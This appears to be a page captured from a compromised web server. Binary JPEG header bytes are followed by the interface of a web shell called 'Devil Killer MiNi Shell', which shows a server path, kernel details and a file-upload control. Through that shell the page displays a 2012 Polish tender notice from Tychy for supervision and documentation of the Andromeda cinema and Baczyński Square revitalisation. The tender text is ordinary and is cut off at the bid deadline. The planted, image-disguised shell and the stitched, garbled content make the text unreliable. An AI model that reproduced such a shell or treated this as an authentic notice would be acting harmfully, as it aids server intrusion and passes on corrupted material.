JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120925/364076-N-2012.html

<p class="kh_header"><b>Tychy: SPRAWOWANIE NADZORU AUTORSKIEGO ORAZ OPRACOWANIE DOKUMENTACJI 
POWYKONAWCZEJ  I PROJEKTOWEJ  DLA POTRZEB ZADANIA INWESTYCYJNEGO, 
PN.: REWITALIZACJA  PLACU BACZYŃSKIEGO- PASAŻ KULTURALNY ANDROMEDA</b><br>
<b>Numer ogłoszenia: 364076 - 2012; data zamieszczenia: 25.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRAWOWANIE NADZORU AUTORSKIEGO ORAZ OPRACOWANIE DOKUMENTACJI 
POWYKONAWCZEJ  I PROJEKTOWEJ  DLA POTRZEB ZADANIA INWESTYCYJNEGO, 
PN.: REWITALIZACJA  PLACU BACZYŃSKIEGO- PASAŻ KULTURALNY ANDROMEDA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest sprawowanie nadzoru autorskiego oraz opracowanie 
      dokumentacji powykonawczej i projektowej dla potrzeb realizacji zadania inwestycyjnego,
      pn.: REWITALIZACJA  PLACU BACZYŃSKIEGO- PASAŻ KULTURALNY ANDROMEDA
      
 2.  Zakres usługi obejmuje m.in.:
     1) SPRAWOWANIA NADZORU AUTORSKIEGO W OKRESIE REALIZACJI INWESTYCJI ,
         a w szczególności::
-	 uczestniczenie na wezwanie Inwestora w spotkaniach roboczych mających na celu  
       wyjaśnianie i omówienie rozwiązań zawartych w dokumentacji projektowej (wizyta  
       każdorazowo potwierdzona wpisem do dziennika budowy)
-	 sporządzanie przedmiarów robót oraz kosztorysów inwestorskich w przypadku robót nie 
       ujętych w dokumentacji projektowej i kosztorysowej
-	 sporządzanie oraz przekazywanie Inwestorowi dokumentacji  stanowiącej  
    uszczegółowienie zaprojektowanych rozwiązań w zakresie niezbędnym do ich 
    prawidłowego wykonania,
-	 zapewnienie nadzoru rzeczoznawców do spraw: zabezpieczeń przeciwpożarowych, 
       higieniczno sanitarnych oraz  bhp. i ergonomii. 

2)  PRZYGOTOWANIA I UZGADNIANIA (KAŻDORAZOWO) DOKUMENTACJI    
     PROJEKTOWEJ W PRZYPADKU STWIERDZENIA  KONIECZNOŚCI ODSTĄPIENIA        
     OD ZATWIERDZONEGO PROJEKTU BUDOWLANEGO LUB INNYCH WARUNKÓW 
     POZWOLENIA NA BUDOWĘ W ZAKRESIE NIEZBĘDNYM DO UZYSKANIA DECYZJI          
     O ZMIANIE POZWOLENIA NA BUDOWĘ.
  
       3)  WYKONANIA GEODEZYJNEGO POMIARU POWYKONAWCZEGO Z NANIESIENIEM 
      ZAPROJEKTOWANEGO I WYKONANEGO UZBROJENIA TERENU  -  4 EGZ. + płyta CD 
      (wersja elektroniczna w formacie PDF),

       4)  OPRACOWANIA DOKUMENTACJI POWYKONAWCZEJ Z NANIESIENIEM 
      WPROWADZONYCH ZMIAN - 4 EGZ. + płyta CD (wersja elektroniczna w formacie PDF),
            W ZAKRESIE WYMAGANYM PRZEZ POWIATOWEGO INSPEKTORA NADZORU 
            BUDOWLANEGO W TYCHACH

       5)  OPRACOWANIA ŚWIADECTWA CHARAKTERYSTYKI ENERGETYCZNEJ - 4EGZ. 
            + płyta CD (wersja elektroniczna w formacie PDF),

       6)  OPRACOWANIA INSTRUKCJI BEZPIECZEŃSTWA POŻAROWEGO - 4EGZ. + płyta CD 
            (wersja elektroniczna w formacie PDF),

       7)  PRZYGOTOWANIE DOKUMENTÓW WYMAGANYCH PRZEZ PAŃSTWOWĄ STRAŻ 
            POŻARNĄ ORAZ PAŃSTWOWĄ  INSPEKCJĘ SANITARNĄ (BEZ ATESTÓW
            I CERTYFIKATÓW NA ZABUDOWANE MATERIAŁY)
  Opracowana dokumentacja projektowa winna odpowiadać obowiązującym przepisom:
-  Ustawa z dnia 4 lutego 1994 r. - o prawie autorskim i prawach pokrewnych ( Dz. U. z 2006 r.      
   Nr 90 , poz. 631 -  tj. z późn. zm.)
          UWAGA:
          W celu uniknięcia naruszenia praw majątkowych i osobistych autora projektu Zamawiający  
           zobowiązuje wykonawcę do uzyskania pisemnej zgody projektanta w zakresie 
           ewentualnych zmian wprowadzonych w dokumentacji projektowej wynikłych w trakcie 
           prowadzonego nadzoru autorskiego.

        -  Ustawa z dnia 7 lipca 1994r. - Prawo budowlane ( tj. Dz. U. z 2010 r. Nr 243, poz. 1623 
            z późn. zm.),

        -  Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków 
           technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002 Nr 75, 
           poz. 690; 2003r. Nr 33, poz. 270; 2004r. Nr 109, poz. 1156; 2008r. Nr 201,poz. 1238; 2008r. 
            Nr 228, poz. 1514; 2009r. Nr 56, poz. 461; 2010r. Nr 239, poz. 1597)

        -  Rozporządzenie Ministra Transportu, Budownictwa z dnia 25 kwietnia 2012 w sprawie 
           szczegółowego zakresu i formy projektu budowlanego ( Dz. U z 2012 r. Nr 0 , poz. 462 )

3.  Zamawiający udostępnia następujące dokumenty:

        3.1  DOKUMENTY FORMALNO PRAWNE
        3.2  PROJEKT ZAGOSPODAROWANIA TERENU:
               1) Podziemne uzbrojenie terenu
               2) Przyłącze wodociągowe
               3) Podziemne uzbrojenie terenu - sieci elektroinstalacyjne
               4) Oświetlenie terenu
        3.3  PROJEKT ARCHITEKTONICZNO-BUDOWLANY
               1) Inwentaryzacja architektoniczno -budowlana
               2) Architektura
               3) Konstrukcja
               4) Instalacje sanitarne
               5) Instalacje wodno - kanalizacyjne
               6) Instalacje grzewcze i wody lodowej
               7) Wentylacja i klimatyzacja
               8) Instalacje elektryczne i słaboprądowe 
       3.4  SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT:
               1) Roboty budowlane
               2) Instalacja wentylacji i klimatyzacji
               3) Instalacje grzewcze i wody lodowej
               4) Instalacje elektryczne i niskoprądowe
               5) System sygnalizacji pożaru i sterowanie oddymianiem
               6) Przyłącze wodociągowe

       3.5  Decyzja Nr 211/2011 z dnia 05 kwietnia 2011 r. zatwierdzająca projekt budowlany 
              i udzielająca pozwolenia na budowę
       3.6  Przedmiary robót w podziale na branże

      Projekt budowlany pn.: PRZEBUDOWA I ZMIANA SPOSOBU UŻYTKOWANIA BYŁEGO KINA 
      ANDROMEDA NA CELE OBIEKTU UŻYTECZNOŚCI PUBLICZNEJ  (FUNKCJA 
      WYSTAWIENNICZA, MEDIATEKA, GASTRONOMIA, USŁUGA),  na parcelach nr: 4843/33,  
      4842/33,  2318/33,  5324,  4844/33  położonych przy  Pl. Baczyńskiego  w Tychach został 
      opracowany przez  Architektoniczne Biuro Projektów  AB - PROJEKT Sp. z o.o.  
      ul. Fabryczna 43, 43-100 Tychy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
   ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach 
   określonych w art. 67 ust.1. pkt. 6) ustawy - Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.24.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3 000,00  zł  (słownie: trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP),  Zamawiający wymaga złożenia następujących dokumentów: 
wykaz usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i 
doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu 
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, 
w którym należy wykazać:  
-   co najmniej jedną usługę w zakresie  sprawowania nadzoru autorskiego    
    w budynku użyteczności publicznej o kubaturze nie mniejszej niż 1000 m3 , 
oraz 
-   co najmniej jedną usługę dotyczącą opracowania powykonawczej dokumentacji 
projektowej w budynku użyteczności publicznej o kubaturze nie mniejszej niż 1000 m3 , 

Do wykazu należy dołączyć dokumenty potwierdzające, że usługi wskazane w wykazie zostały wykonane należycie.

      (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
      spełniać łącznie  lub co najmniej jeden z Wykonawców). 
      Wykaz usług projektowych należy sporządzić wg wzoru druku stanowiącego załącznik  
      Nr 3 do SIWZ.
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) Zamawiający wymaga złożenia następujących dokumentów:  
                 
            1)  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności 
                   odpowiedzialnych za świadczenie usług , wraz z informacją na temat ich kwalifikacji 
                 zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,   
                 a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie 
                 do dysponowania tymi osobami.
                   Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
                 a w szczególności:

  a)  co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
        bez ograniczeń w specjalności architektonicznej  
                         b)  co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
        bez ograniczeń w specjalności konstrukcyjno -budowlanej 

           c)  co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
       bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 
       cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
           d)  co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
                w specjalności instalacyjno - inżynieryjnej w zakresie sieci sanitarnych i instalacji 
                sanitarnych

           e)  co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
                 w specjalności instalacyjno - inżynieryjnej w zakresie instalacji elektrycznych 
                
              Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik Nr 4 do SIWZ.

             (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
              spełniać łącznie lub co najmniej jeden z wykonawców).     

        2)  oświadczenie , że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
                wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
  
Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 5 do SIWZ.
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), Zamawiający wymaga, złożenia następujących dokumentów: 


       1) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że  
           Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
           działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia 
     nie mniejszej niż  125 000,00 zł ,
                 Do oferty należy dołączyć potwierdzenie opłacenia polisy  l u b  fakt  jej opłacenia 
                 musi wynikać z treści dokumentu.
                 Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
                 jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
                 związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
                 dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
                 opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
    

        (W przypadku podmiotów występujących wspólnie powyższy warunek udziału wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców). 
                                                              Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
                 dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
                 może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany Formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ
2)	wypełniony i podpisany Formularz oferty cenowej - sporządzony wg wzoru stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
       1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;                   
       2)  zmian personalnych, adresowych, formy prawnej stron umowy;
       3)  zmiana osoby pełniącej nadzór;
       4)  zmiana terminu realizacji przedmiotu umowy, w następstwie:
           a) siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego 
               niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy 
               zachowaniu najwyższej staranności  a które uniemożliwia Wykonawcy wykonanie jego 
               zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony umowy 
               zobowiązane są dołożyć wszelkich starań w celu  ograniczenia do minimum opóźnienia
               w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły 
               wyższej;
           b) zmian będących następstwem działań organów administracji, (np. opóźnienia
               w uzyskaniu uzgodnień, decyzji administracyjnych dotyczących przedmiotu umowy);

           c) zmian będących okoliczności leżących po stronie Zamawiającego i nie wynikających        
               z  winy Wykonawcy ( np. wstrzymanie terminu realizacji przedmiotu umowy, zmiany 
               przewidywanego okresu realizacji inwestycji, wstrzymanie, przerwa w realizacji 
               inwestycji, odstąpienie Zamawiającego od realizacji inwestycji);
       5)  zmiany sposobu i terminu rozliczeń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny (pokój nr 20) 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 08:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
